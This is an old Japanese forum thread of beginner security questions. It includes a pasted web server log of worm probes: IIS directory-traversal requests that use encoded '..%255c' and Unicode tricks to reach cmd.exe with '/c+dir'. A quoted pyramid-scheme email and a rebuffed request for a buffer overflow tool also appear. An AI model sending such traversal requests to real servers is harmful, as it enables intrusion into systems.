anon.free.anonymizer.com:80 一般的な情報 REMOTE_HOST 168.143.113.132 REMOTE_ADDR 168.143.113.132 HTTP_REFERER (none) HTTP_USER_AGENT . Mozilla/4.78 (TuringOS; Turing Machine; 0.0) HTTP_ACCEPT . image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* HTTP_ACCEPT_LANGUAGE . ja HTTP_ACCEPT_ENCODING . identity HTTP_HOST . www.taruo.net その他の情報 HTTP_CONNECTION . (none) 判定 168.143.113.132 (168.143.113.132) 判定:プロクシです proxy判定箇所が 1箇所、疑惑点が 0箇所ありました。 漏れ判定:漏れてはいないようです 総合評価:A+ 極めて物静かなproxyです。proxy経由であることを示す情報がほとんどありません。 この串使える?
218.43.168.*** - - [10/Jul/2002:00:05:57 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284 218.43.168.*** - - [10/Jul/2002:00:05:57 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282 218.43.168.*** - - [10/Jul/2002:00:05:57 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 218.43.168.*** - - [10/Jul/2002:00:05:57 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 218.43.168.*** - - [10/Jul/2002:00:05:57 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 218.43.168.*** - - [10/Jul/2002:00:05:58 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323 218.43.168.*** - - [10/Jul/2002:00:05:58 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323 218.43.168.*** - - [10/Jul/2002:00:05:58 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 218.43.168.*** - - [10/Jul/2002:00:05:58 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 218.43.168.*** - - [10/Jul/2002:00:05:58 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 218.43.168.*** - - [10/Jul/2002:00:05:58 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 218.43.168.*** - - [10/Jul/2002:00:05:59 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 218.43.168.*** - - [10/Jul/2002:00:05:59 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289 218.43.168.*** - - [10/Jul/2002:00:05:59 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289 218.43.168.*** - - [10/Jul/2002:00:05:59 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 218.43.168.*** - - [10/Jul/2002:00:05:59 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 韓国や中国からはこんなの毎日きますが、 日本の方からきたの初めてです。 しかもかなりしつこいので困ってます どうしたらよいでしょうか?
そのワームはIIS動かしたりしてなければ放置しtめおいしょう。
HP閲覧中に、自分は何もしてないのに、突然PCが強制終了してしまった のですが、何なんですか?ハッキングでしょうか?ゾーン・アラームを 常駐していたのですが、警告も何もなかったです。
>>898 IISは動かしてないんでしばらく放置しときます。
ありがとう
>>899 MS社のOSを使ってたらたまにあります。
PCが落ちるのはハッキングされるより、
環境が不安定なためであったりすることが多いと思われ。
既出かも知れないけど、電波板にアクセスしたら VBS.LoveLetter.Varをハケーンしたでつ。 ノートン先生が。
903 :
名無しさん@お腹いっぱい。 :02/07/13 18:46
age
904 :
名無しさん@お腹いっぱい。 :02/07/13 19:01
今日はじめて知って、今kernelアップデート中なんだけどformatのセキュリティホールって 具体的にはどうするとセキュリティホールなんですか?
これだから犬厨は…
906 :
名無しさん@お腹いっぱい。 :02/07/13 21:50
↑つうかこの板の他の人よりはセキュリティー板らしい質問だと思うんだけど... つうかUNIX使いはLinuxのどこが気に入らないんですか? まあ、自分も含めて全体のレベルが低いのは確かですが、ユーザー数が多いので仕方ないでしょう。 素直に疑問
907 :
名無しさん@お腹いっぱい。 :02/07/13 22:35
差出人 Mail Delivery Subsystem 件名 Returned mail: see transcript for details というメールが最近頻繁にやってきます。自分からメールを出したときで無くてもこれがやってくる場合ってあるんでしょうか? Klezが入っていたものも(入っていないものもあった)あって、心配です。 ウイルススキャンしてみても特にパソコンが感染している様子は無いんですけれど...
>907 Klezで送信者が907で受取人が存在しないものに設定された場合届くかもね。 直接Klezが届く事はないのかい?
909 :
名無しさん@お腹いっぱい。 :02/07/13 23:01
>908 いえ、直接届いたことはまだありません。 必ず上記のメールで ATT000**(**は数字).dat と、もうひとつ名前がランダムで1KBほどのファイルが添付されてきます。 メールサーバの会社からVIRUS ALERTのメールで警告も来ました。ただ、そのメールに >ウィルスの種類によっては、差出人を詐称するものもございます、心当たりが無ければ云々 とあったので、それかな?とも。 ホームページで連絡用に公開しているメールアドレス宛てに来るので、名前を騙られているだけかも...とはいえ不安ですが。
http://dms100.org/worksucks あの、これを踏んでしまったんですが、どうなりますか?
ウィルス警告が出てたのですが、同時にグロ画像がたくさん出てきたので
パニクってスイッチ切ってしまいました。今スキャンしてますが、かなり
時間がかかるので気になって仕方ありません。
誰か、上のについて知ってる人がいたら教えてもらえませんか?
911 :
名無しさん@お腹いっぱい。 :02/07/14 03:17
さっきからね、ぞぬがなりまくってて、 調べたら何か韓国からアクセスがあるようなんですが、 これはだいじょうぶなんすかね? 6699と5000とhttpへのアクセスが多いです・・。
>>910 どうなりますかって・・・
自分でどうなったか書いてるじゃん
>>910 俺は簡単なHTMLしかわからんヘタレなんで詳しい説明はできんけど、
中で1ame.htmlとlame.htmlの2つが呼び出されてて、それぞれウィンドウが開く。
1ame.htmlのほうは音が鳴るだけ。lame.htmlのほうは、ブラクラチェッカー
http://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi にかけたら、「無限 JavaScript」警報と出た。
ソースを見ようと思っても「ウィルスがある」とノートン先生に邪魔されて見れない。
たぶん大丈夫とは思うが、俺も小心者なのでこのへんでやめておく。
そういうわけで、電源プッチンによるダメージをとりあえず心配しとけばいいんじゃないの?
今後はJava ScriptやActive Xの設定をオンにしたまま怪しいページに行かないように。
てかJSとActiveXなんか常時オフだろ 踏んだけどゲイの絵でてきて終わりでがっかりだよ
915 :
名無しさん@お腹いっぱい。 :02/07/14 06:34
Win2k.IE6.フレッツADSLでRASPPPOEを使って接続しています Sygate Personal Firewallを入れたのですが、デフォルトの状態では ネットに接続出来なくなってしまいました。 ログを見たのですが、PPPoE接続で使うドライバーみたいなものが、 IPアドレス0.0.0.0を通信したがってたみたいだったので、許可したところ ネットに接続できるようになったのですが、これは間違ってるんでしょうか? 知ってる人がいたら、ヒントだけでも欲しいです。 おながいします
0.0.0.0ってのは特に指定していないアドレスすべてを指す。 それでかまわん。
>>916 わかりました、どうもありがとうございました。
心配だったんで助かりましたー
先日、下記のメールが配信されました。 この内容には間違いがあり、違法性があるという指摘を受けました。 大変ご迷惑をお掛けしました事を深くお詫び致します。 つきましては、絶対に振り込みなどなさらないようにご注意下さい。 また、万が一、すでに振り込みを行われた方はご連絡をお願いします。 連絡先は *****@*****.cx にお願いします。 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− これは、アメリカより上陸しましたニュービジネス感覚のゲームです。 ■■たったの3000円が大金に化ける!!■■■ ★遊びのつもりがびっくり仰天。 ★必要なのは3000円と比較的低金額だったので参加してみました。 ★おこづかいを稼ぎたい人は最後まで読んでみてください。 ★アメリカで大人気のニュービジネスゲーム!! ★これは宝クジと違いあなたの努力次第で結果がでます。
◆例えば・・・(少なく見積もって、1週間に3人ずつ参加すると過程して...) *1週間目で3件分の入金(リストの一番下にあなたの名前が) 1000円×3人で・・・3000円入金! *2週間目で、その3人が新たに3人分の入金を得ます(リストの中段に名前が) (3人×3人)×1000円で・・・9000円入金!! *3週間目で、その9人が3件の入金を得ると・・・(リストの一番上に名前が) (9人×3人)×1000円で・・・2万7千円入金!!!
フレッツADSLの8Mを利用しています。 経路情報のGateway Adressで「127.0.0.1」が出てきました。 IPドメインサーチで調べたところ、 IANA (LOOPBACK) Internet Assigned Numbers Authority 4676 Admiralty Way, Suite 330 Marina del Rey, CA 90292-6695 US Netname: LOOPBACK Netblock: 127.0.0.0 - 127.255.255.255 と、いう結果でした。 これは、米国へ国際電話をかけているのでしょうか? 初心者なもので、よろしく、お願いいたします。
>>920 127.0.0.1ってのは、loopback
早い話が自分。
warota..... つーかこんな初心者にWhois教えた奴は死刑だな
しかもこんな日曜の朝っぱらから、先に2レスもついてるとはびっくらこいた
>>921 ,922
お騒がせしました。
「LOOP BACK」を勉強しました。
安心できます。ありがとうございました。
>>923 教えてもらったわけではなく、無い知恵搾って、検索したのですが(^^ゞ
926 :
名無しさん@お腹いっぱい。 :02/07/14 09:59
ZoneAlarmを入れているのですが、SavwNowがうるさくてかないません。 これ、なんとかなりませんか?無視し続けてもいいんですが、 ネットにアクセスしそうになるたびに動作が不安定になりそうなので、 根本から解決したいのですが・・・・。
なんだそれ
>925 その努力はいいことっす。
929 :
nanasi :02/07/14 12:02
教えて下さい。 彼の気持ちを確かめたくてフリーメールを出そうと 思うのですが、ホスト名なのでばれないでしょうか? かれはPCに詳しい人です。
最近のフリーメールはIPアドレス大抵出るような
931 :
nanasi :02/07/14 12:09
>>930 そうですか。
やっぱりやめた方がいいのかな・・・。
バッファオーバーフローツールの「Hckyou」というのを探しているのですが 見つかりません。どこでDLすることができるでしょうか?サーチエンジンを 使ってもなかなかHITしません。お願いします。
ScriptKiddiesは氏ね
935 :
名無しさん@お腹いっぱい。 :02/07/14 15:16
近頃カーネル32が外部と頻繁に通信しようとしてるんですが やばいでしょうか?
936 :
名無しさん@お腹いっぱい。 :02/07/14 18:55
久々に実家帰って、実家のPCを触ってみたらウイルス入ってますた。 JS_EXC〜なんとかというもので、検索してみたら削除すれば良いとあったので 発見後削除しました。 それと関係あるのかないのか、スタートメニューに「E-Z-LIVE」という.exeファイルが 常駐しています。削除しても削除しても起動するたびに出てきます。 \C\Windowsに入っているので、直接削除しようとしたのですが、windowsが使用中で 削除できない、と言われます。 そのファイルのショートカットがデスクトップに勝手に作成されているのですが、 それがまた、どう見てもエロサイトの絵みたいなんです。 ブラウザの「検索」もエロサイトになってて、意味がわかりません。 父も弟も問いただしましたが、知らないフリをします。 どうにかして「E-Z-LIVE」を削除して、検索もgooに戻したいです。 スレ違いだったら申し訳ないのですが、どなたかお助けください。
>937 すいませんでした。逝ってきます。
>>906 犬板ならkernelアップデート中だけでわかるだろうね。
隔離板から出てくるなという事。
>>936 >windowsが使用中で削除できない
Safe Modeで再起動して、スタートアップとショートカット先ファイルを削除。
IE6なら、プロパティ→プログラム→Webの設定のリセットを押す。
接続の設定から、電話番号が国際電話やQ2になっているのを修復。
どなたか、教えてください。 私はWIN95のノートを使っています。 保育園の会員制のページがあるのですが IDとPWを入力してもエラーで入れません。 WIN95のせいなのでしょうか? 困っています。(T▽T)尸~~SOS!!
>>941 OSはあまり関係無さげっすけど。
ここに書くより、直接管理者に相談するのが近道だと思いまする。
つーか URLとエラーメッセージもわからんのに答えられるとでも
ここに来るたびにラブレターウィルスとかやってくるのは何故? たかが掲示板開いただけなのに。。。
お尋ねします 今WIN2000にZA 2.6を使ってまつ(結構前に入れたの) これからPCを常時電源ONにしようと思い、ZAと共存出来そうな FWを探しています。 フリーでお勧めはありまつか?
947 :
二つ目のお気に入りとして使って :02/07/14 23:31
>948 んっと、上手く言えないでつが、ポート毎にフィルタリングしたり したいんです。 VMwareを買ったので、そのヴァーチャルマシンの絡みなんかが 有りまして・・・ でも、ZAのステルス機能と言うかポートスキャンしてもcloseにならない のはお気に入りなんでつ 我がまま過ぎますかね
だったらZone消して他の入れればいいだろう。 基本的にPFW複数いれるのはやめれ。競合して まともに動かなかったりする。機能被ってんだから。 正常に動いたとしてもセキュリティがプラスには殆どならない。
あと >ZAのステルス機能と言うかポートスキャンしてもcloseにならない >のはお気に入りなんでつ それFW入れてれば普通
だったら新しいの探した方が良いかな もうちょっとルーティングの設定とかが出来れば良いんだけどなあ 色々入れてみます >951 そうなんですか?Tiny入れて突っついてみたらcloseだった様な
Kerio出る前Tiny使ってたが全部Stealthだったが 今はルータ入れてとっぱらったが Rule basedのFWはいくらでもルール設定で改悪できるからな
954 :
名無しさん@お腹いっぱい。 :02/07/15 12:29
age
955 :
名無しさん@お腹いっぱい。 :02/07/15 14:49
957 :
名無しさん@お腹いっぱい。 :02/07/15 14:52
>>957 それはISPによりけり
アカウント以外の任意の名前を付けられるとこもある
959 :
名無しさん@お腹いっぱい。 :02/07/15 15:01
適当に思いつく名前入れると、どんどんでてきます
佐藤キター
アミ
962 :
名無しさん@お腹いっぱい。 :02/07/15 15:16
あきこ
何が問題なのかわからんが Geocitiesだって同じカテゴリで数字適当に打てば出てくるだろ
964 :
名無しさん@お腹いっぱい。 :02/07/15 15:19
名前がでてるだろそれ問題
それは苗字をIDとして登録した客がヴァカ
つかさっさとindex.htmlとっかえればいいだけの話じゃねーの
967 :
名無しさん@お腹いっぱい。 :02/07/15 15:24
まあ、そーですけど、こんなテンプレートでいいのかよ
968 :
名無しさん@お腹いっぱい。 :02/07/15 15:25
存在自体しらない素人が多いのにさぁ
969 :
名無しさん@お腹いっぱい。 :02/07/15 15:26
名前じゃなくてユーザidだろ。姓と同じユーザidを選択したユーザがいるだけ。 姓と同一のユーザidしか認めていないならば、同姓な奴が既に加入していると加入できなくて問題かもしれない。
971 :
名無しさん@お腹いっぱい。 :02/07/15 15:29
いやだからこれケーブルネットで、狭い町なわけです。 でこんなん出るともうバレバレです。
index.html集めてリスト作ってプロバイダに送ってやれば? 漏れは困らないからどうでもいい。
まー俺も大学入ったときに勝手に大学サーバにHPスペースが作られてて そこに個人情報のっけられてたな. オマエラも1回Googleとかで自分の名前検索しとけ
めぐみキター
ゆかりキター
んで結局何をしたいのか不明なわけだが
そうですね。よかったね。続きは初ネットあたりでどうぞ。 ↓次の質問どうぞ
初ネット板ってまだあったのか
そろそろ次スレ立てないと前みたいになるぞ
くだらない質問は新規でスレを立てたり関係ないスレに書き込まずにこのスレに書いてください
掲示板の荒らし方や侵入の方法、メールボムの送り方等、攻撃方法の質問はご遠慮ください。
2ちゃんねるでは荒らし依頼は出来ません。また、この板ではアタック依頼は受け付けません。
★!超頻出!★
2ch見ていたらvbsウィルスが検出された!
→ノートンの誤検出です。↓のスレへどうぞ
http://pc.2ch.net/test/read.cgi/sec/1025872269/ 関連リンク
>>1-20 各種ファイアーウォール ログ解析ツール 日本語化パッチ
セキュリティチェックサイト whois 解説サイト 最新ウィルス情報
関連スレ・関連板、お約束、FAQ
ずれていたら
>>1-40 参照
(winなら)[Ctrl]キーと[F]キー(macなら)[コマンド]キーと[F]キーを同時に押すとページ内検索が出来ます
過去スレや関連スレの過去ログ等を調べてから質問してください
同じ質問を複数の板やスレッドに書き込むマルチポストは嫌われます。
答をもらえなくなるので、書き込んでしばしお待ちください。
お急ぎなら検索が早いかも?
http://www.google.com/intl/ja/
ごめん、やっぱそのまま立てよう めんどい
>>984 今気がついたんだが黒氷って無料扱いでいいの?
確かに体験版ならあるけど。
umeruka
1000 :
名無しさん@お腹いっぱい。 :02/07/16 13:25
ばーか。
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。